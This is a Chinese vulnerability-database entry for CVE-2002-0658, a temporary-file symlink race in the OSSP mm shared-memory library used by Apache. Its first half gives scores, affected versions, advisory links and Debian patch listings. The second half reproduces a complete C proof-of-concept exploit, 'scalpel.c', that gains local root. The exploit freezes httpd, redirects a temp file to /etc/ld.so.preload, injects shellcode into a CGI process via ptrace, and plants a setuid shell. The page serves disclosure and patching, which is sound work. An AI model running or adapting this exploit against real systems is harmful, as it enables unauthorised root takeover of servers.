CVE-2002-0658
CVSS6.2
发布时间 :2002-08-12 00:00:00
修订时间 :2013-09-04 00:18:30
NMCOE    

[原文]OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.


[CNNVD]MM共享内存库临时文件本地权限提升漏洞(CNNVD-200208-069)

        
        OSSP MM是一款共享内存程序库。
        OSSP MM存在竞争条件漏洞,本地攻击者可以利用这个漏洞进行权限提升。
        Marcus Meissner和Sebastian Krahmer发现在MM共享库中在处理临时文件时存在竞争条件漏洞,本地攻击者可以利用这个漏洞进行权限提升。
        Apache Web服务程序使用了MM共享库,如果拥有Apache用户权限的攻击者,可以利用这个漏洞获得root用户权限。
        

- CVSS (基础分值)

CVSS分值: 6.2 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ossp:mm:1.1.3
cpe:/a:ossp:mm:1.1.0
cpe:/a:ossp:mm:1.1.2
cpe:/a:ossp:mm:1.0.2
cpe:/a:ossp:mm:1.0.0
cpe:/a:ossp:mm:1.0.6
cpe:/a:ossp:mm:1.0.3
cpe:/a:ossp:mm:1.0.4
cpe:/a:ossp:mm:1.0.1
cpe:/a:ossp:mm:1.0.7
cpe:/a:ossp:mm:1.1.1
cpe:/a:ossp:mm:1.0.8
cpe:/a:ossp:mm:1.0.5
cpe:/a:ossp:mm:1.0.9
cpe:/a:ossp:mm:1.0.11
cpe:/a:ossp:mm:1.0.12
cpe:/a:ossp:mm:1.0.10

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0658
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0658
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-069
(官方数据源) CNNVD

- 其它链接及资源

http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-045.php
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2002:045
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:05.asc
(UNKNOWN)  FREEBSD  FreeBSD-SN-02:05
http://www.securityfocus.com/bid/5352
(UNKNOWN)  BID  5352
http://www.redhat.com/support/errata/RHSA-2003-158.html
(UNKNOWN)  REDHAT  RHSA-2003:158
http://www.redhat.com/support/errata/RHSA-2002-163.html
(UNKNOWN)  REDHAT  RHSA-2002:163
http://www.novell.com/linux/security/advisories/2002_028_mod_ssl.html
(UNKNOWN)  SUSE  SuSE-SA:2002:028
http://www.iss.net/security_center/static/9719.php
(UNKNOWN)  XF  mm-tmpfile-symlink(9719)
http://www.debian.org/security/2002/dsa-137
(UNKNOWN)  DEBIAN  DSA-137
http://rhn.redhat.com/errata/RHSA-2002-164.html
(UNKNOWN)  REDHAT  RHSA-2002:164
http://rhn.redhat.com/errata/RHSA-2002-156.html
(UNKNOWN)  REDHAT  RHSA-2002:156
http://rhn.redhat.com/errata/RHSA-2002-154.html
(UNKNOWN)  REDHAT  RHSA-2002:154
http://rhn.redhat.com/errata/RHSA-2002-153.html
(UNKNOWN)  REDHAT  RHSA-2002:153
http://online.securityfocus.com/advisories/4392
(UNKNOWN)  HP  HPSBTL0208-056
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-032.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-032.0

- 漏洞信息

MM共享内存库临时文件本地权限提升漏洞
中危 竞争条件
2002-08-12 00:00:00 2005-05-02 00:00:00
本地  
        
        OSSP MM是一款共享内存程序库。
        OSSP MM存在竞争条件漏洞,本地攻击者可以利用这个漏洞进行权限提升。
        Marcus Meissner和Sebastian Krahmer发现在MM共享库中在处理临时文件时存在竞争条件漏洞,本地攻击者可以利用这个漏洞进行权限提升。
        Apache Web服务程序使用了MM共享库,如果拥有Apache用户权限的攻击者,可以利用这个漏洞获得root用户权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-137-1)以及相应补丁:
        DSA-137-1:New mm packages fix insecure temporary file creation
        链接:
        http://www.debian.org/security/2002/dsa137-

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/m/mm/mm_1.0.11-1.2.dsc

        Size/MD5 checksum: 553 6bf8816fa3395bc685451501f203b60b
        
        http://security.debian.org/pool/updates/main/m/mm/mm_1.0.11.orig.tar.gz

        Size/MD5 checksum: 142893 e8f12c85582bd9994369ea4098c3424c
        
        http://security.debian.org/pool/updates/main/m/mm/mm_1.0.11-1.2.diff.gz

        Size/MD5 checksum: 5184 81bd3aaa499f029254fa64a7fc9a1660
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_alpha.deb

        Size/MD5 checksum: 13788 e45aec9dc3688a0a8500c88d04c49f33
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_alpha.deb

        Size/MD5 checksum: 32060 3a20277fd97bdf52afc511c5cf7a922a
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_arm.deb

        Size/MD5 checksum: 11876 36bf40e33e1e58ab59bdbc7e6b27327a
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_arm.deb

        Size/MD5 checksum: 29194 eeba5fb89081bfc67cc1eb4c8ae7beaf
        Intel ia32 architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_i386.deb

        Size/MD5 checksum: 12100 52a6b793c890790319b5d328ee1b7a0d
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_i386.deb

        Size/MD5 checksum: 28924 888a040a28f6c942424b609bb92ddc88
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_m68k.deb

        Size/MD5 checksum: 11560 f86c03c040087127c74f8ddb0ebb23b4
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_m68k.deb

        Size/MD5 checksum: 28752 aba689b014f669d0cadeefaa7720b9d7
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_powerpc.deb

        Size/MD5 checksum: 12286 159aa5cb4938fa844ad6b93990d125b3
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_powerpc.deb

        Size/MD5 checksum: 30340 785b5ed0a9cb5b00f4e3182b7a457b44
        Sun Sparc architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_sparc.deb

        Size/MD5 checksum: 12170 f4f4911490dcec804e2215d8c6dcb373
        
        http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_sparc.deb

        Size/MD5 checksum: 29664 fa63ddb6ab216e7d7d7caa09531a6967
        Debian GNU/Linux 3.0 alias woody
        - ------------------------------------
        Source archives:
        
        http://security.debian.org/pool/updates/main/m/mm/mm_1.1.3-6.1.dsc

        Size/MD5 checksum: 565 90c7910a97454ac9aa1abc0bc79cf316
        
        http://security.debian.org/pool/updates/main/m/mm/mm_1.1.3.orig.tar.gz

        Size/MD5 checksum: 137951 ba14a90239e26337eef079b698f35eae
        
        http://security.debian.org/pool/updates/main/m/mm/mm_1.1.3-6.1.diff.gz

        Size/MD5 checksum: 4300 44c3bd2710d53798f19228ffb4a32b78
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_alpha.deb

        Size/MD5 checksum: 15884 e95d9355d8c1ce4e67b057e9f7b644ed
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_alpha.deb

        Size/MD5 checksum: 35894 613548b6398dff2a72d8831dfa0bd405
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_arm.deb

        Size/MD5 checksum: 14082 bc8d016410dc8ae21bd273239432e58e
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_arm.deb

        Size/MD5 checksum: 33312 e148f2ef714cc6cd7b4021ec75fb19e0
        Intel ia32 architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_i386.deb

        Size/MD5 checksum: 14090 f118e324b0b4baf755e4b6c0532138f0
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_i386.deb

        Size/MD5 checksum: 32750 d089be8693d8c2dcaae3fb953d9eec54
        Intel ia64 architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_ia64.deb

        Size/MD5 checksum: 18668 a2a7024d9f7fae7823bf6f4eb7d9f04d
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_ia64.deb

        Size/MD5 checksum: 37466 1b6a21155340aa8ba1a407ac3ca6f92e
        HP Precision architecture:
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_hppa.deb

        Size/MD5 checksum: 15124 a727a96c2deaecc8744a38c2790dd3c6
        
        http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_hppa.deb

- 漏洞信息 (21667)

MM 1.0.x/1.1.x Shared Memory Library Temporary File Privilege Escalation Vulnerability (EDBID:21667)
linux local
2002-07-29 Verified
0 Sebastian Krahmer
N/A [点击下载]
source: http://www.securityfocus.com/bid/5352/info

The MM Shared Memory library is reported to be prone to a race condition with regards to temporary files which may enable a local attacker to gain elevated privileges. This issue may reportedly be exploited by an attacker with shell access as the Apache webserver user to gain root privileges on a vulnerable host. 

/*** scalpel.c -- local apache/PHP root via libmm (apache-user -> root)
 ***
 *** (C) 2002 Sebastian Krahmer proof of concept exploit.
 ***
 *** Exploiting conditions:
 ***
 *** Apache is linked against libmm which has /tmp races.
 *** Upon Apache start or restart code is executed like
 *** unlink("/tmp/session_mm.sem"); open("/tmp/session_mm.sem", O_RDWR|O_CREAT).
 *** If attacker exploited any CGI or PHP script remotely he gained
 *** apache-user and can go one step further to get root by:
 ***
 *** 1) STOPing all httpd's and bring root to execute /etc/rc.d/apache restart
 ***    Its very likely root does so because webserver just doesnt work anymore
 ***    (all childs are STOPed). One can also send him fake-mail
 ***    from httpd-watchdog that he has to invoke the command.
 *** 2) Install signal-handler and using 2.4 directory notifying to see when
 ***    /tmp/session_mm.sem is unlinked. Create link to /etc/ld.so.preload
 ***    immediately which makes Apache creating that file.
 *** 3) Trigger execution of a CGI script where Apache leaks a descriptor
 ***    (r+w) to /etc/ld.so.preload to the child.
 *** 4) Ptrace that script, inject code which writes content to preload-file.
 *** 5) Execute suid-helper to execute code as root.
 ***
 *** Note in 4) that we cant ptrace httpd alone because it setuid'ed from root
 *** to apache-user thus setting id-changed flag. By triggering execve() of
 *** a CGI script this flag is cleared and we can hijack process.
 ***
 *** assert(must-be-apache-user && must-have-a-cgi-script-installed &&
 ***        must-bring-root-to-restart-apache);
 ***
 ***
 *** wwwrun@liane:~> cc scalpel.c -Wall
 *** wwwrun@liane:~> ./a.out /cgi-bin/genindex.pl
 *** httpd(2368): Operation not permitted
 *** Creating /tmp/boomsh
 *** Creating /tmp/boomso
 *** Installed signal-handler. Waiting for apache restart.
 *** ++++++Forking off proc-scan to attach to CGI-script.
 *** Triggering CGI: /cgi-bin/genindex.pl
 *** Got cgi-bin PID 2460
 *** Injecting of write-code finished.
 *** blub
 *** +sh-2.05# id
 *** uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
 *** sh-2.05#
 ***/

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <sys/stat.h>
#include <dirent.h>
#include <sys/types.h>
#include <string.h>
#include <errno.h>
#include <sys/ptrace.h>
#include <asm/ptrace.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Please do not complain about ugly code; its a 1h exploit.
 * For good code see crypto-pty for example ;-)
 */
int create_link()
{
	symlink("/etc/ld.so.preload", "/tmp/session_mm.sem");
	return 0;
}


void die(char *s)
{
	perror(s);
	exit(errno);
}

void sig_x(int x)
{
	create_link();
	printf("+");
}


void usage()
{
	printf("Usage: scalpel <cgi-script>\n\n"
	       "i.e. ./scalpel /cgi-bin/moo.cgi\n");
	exit(1);
}

int scan_proc()
{
	int lastpid, fd, i, pid, done = 0;
	unsigned int eip;
	char fname[1024];
	char code[] = 
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\xe8\x10\x00\x00\x00\x2f\x74\x6d\x70\x2f\x62\x6f"
		"\x6f\x6d\x73\x68\x2e\x73\x6f\x0a\x00\xb8\x04\x00"
		"\x00\x00\xbb\x05\x00\x00\x00\x59\xba\x0f\x00\x00"
		"\x00\xcd\x80\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80";
	unsigned long *p;

	printf("Forking off proc-scan to attach to CGI-script.\n");

	if (fork() > 0)
		return 0;

	lastpid = getpid();

	while (!done) {
		for (i = 0; i < 100; ++i) {
			snprintf(fname, sizeof(fname), "/proc/%d/cmdline", lastpid+i);
			if ((fd = open(fname, O_RDONLY)) < 0)
				continue;
			read(fd, fname, sizeof(fname));
			close(fd);
			if (strcmp(fname, "/usr/bin/perl") == 0) {
				if (ptrace(PTRACE_ATTACH, lastpid+i,0,0) < 0) {
					pid = lastpid+i;
					done = 1;
					break;
				}
			}
		}
	}
			
	printf("Got cgi-bin PID %d\n", pid);

	waitpid(pid, NULL, 0);

	eip = ptrace(PTRACE_PEEKUSER, pid, 4*EIP, 0);
	if (errno)
		die("ptrace");
	for (p = (unsigned long*)code; i < sizeof(code); i+= 4, ++p) {
		if (ptrace(PTRACE_POKETEXT, pid, eip + i, *p) < 0)
			die("ptrace");
	}

	if (ptrace(PTRACE_POKEUSER, pid, 4*EIP, eip+4) < 0)
		die("ptrace");

	if (ptrace(PTRACE_DETACH, pid, 0, 0) < 0)
		die("ptrace");
	printf("Injecting of write-code finished.\n");
	exit(0);
}


int tcp_connect(const char *host, u_short port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in sin;

	if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
		die("sock");

	if ((he = gethostbyname(host)) == NULL) {
		herror("gethostbyname");
		exit(EXIT_FAILURE);
	}

	memset(&sin, 0, sizeof(sin));
	memcpy(&sin.sin_addr, he->h_addr, he->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = port == 0 ? htons(80):htons(port);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin)) < 0) {
		close(sock);
		return -1;
	}
	return sock;
}


int trigger_cgi(const char *cgi)
{
	char cmd[1024];
	int sock = tcp_connect("127.0.0.1", 80);

	printf("Triggering CGI: %s\n", cgi);

	snprintf(cmd, sizeof(cmd), "GET %s HTTP/1.0\r\n\r\n", cgi);
	if (write(sock, cmd, strlen(cmd)) < 0)
		die("write");
	sleep(1);
	close(sock);
	return 0;
}

int create_boomsh()
{
	FILE *f = fopen("/tmp/boomsh.c", "w+");

	printf("Creating /tmp/boomsh\n");
	if (!f)
		die("fopen");
	fprintf(f, "#include <stdio.h>\nint main()\n{\nchar *a[]={\"/bin/sh\",0};"
		   "setuid(0); execve(*a, a, NULL);return 1;}\n");
	fclose(f);
	system("gcc /tmp/boomsh.c -o /tmp/boomsh");
	return 0;
}


int create_boomso()
{
	FILE *f = fopen("/tmp/boomso.c", "w+");

	printf("Creating /tmp/boomso\n");
	if (!f)
		die("fopen");
	fprintf(f, "#include <stdio.h>\nvoid _init(){if (geteuid()) return;printf(\"blub\n\");"
		   "chown(\"/tmp/boomsh\",0, 0); chmod(\"/tmp/boomsh\", 04755);"
	           "unlink(\"/etc/ld.so.preload\");exit(0);}");
	fclose(f);
	system("gcc -c -fPIC /tmp/boomso.c -o /tmp/boomso.o;"
	       "ld -Bshareable /tmp/boomso.o -o /tmp/boomsh.so");
	return 0;
}


int main(int argc, char **argv)
{
	int fd;
	struct stat st;
	char *cgi = NULL;
	extern char **environ;
	char *boomsh[] = {"/tmp/boomsh", NULL};
	char *suid[] = {"/bin/su", NULL};

	if (argc < 2)
		usage();

	cgi = strdup(argv[1]);

	setbuffer(stdout, NULL, 0);

	system("killall -STOP httpd");

	create_boomsh();
	create_boomso();

	if ((fd = open("/tmp", O_RDONLY|O_DIRECTORY)) < 0) {
		return -1;
	}

	if (fcntl(fd, F_SETSIG, SIGUSR1) < 0) {
		return -1;
	}

	if (fcntl(fd, F_NOTIFY, DN_MODIFY|DN_DELETE|DN_RENAME|DN_ATTRIB
			       |DN_CREATE|DN_MULTISHOT|DN_ACCESS) < 0) {
		return -1;
	}
	
	signal(SIGUSR1, sig_x);

	printf("Installed signal-handler. Waiting for apache restart.\n");

	/* wait for /etc/ld.so.preload to apear */
	while (stat("/etc/ld.so.preload", &st) < 0)
		sleep(1);


	/* forks off daemon */
	scan_proc();

	/* Trigger execution of a CGI-script */
	trigger_cgi(cgi);

	for(;;) {
		sleep(1);
		memset(&st, 0,sizeof(st));
		stat("/etc/ld.so.preload", &st);
		if (st.st_size > 0)
			break;
		if (stat("/tmp/boomsh", &st) == 0 && st.st_uid == 0)
			break;
	}

	/* Apropriate content is in /etc/ld.so.preload now */
	if (fork() == 0) {
		execve(*suid, suid, NULL);
		exit(1);
	}
	sleep(3);
	execve(*boomsh, boomsh, environ);

	return 0;
}

		

- 漏洞信息

5150
OSSP mm Library Symlink Privilege Escalation
Local Access Required Race Condition

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站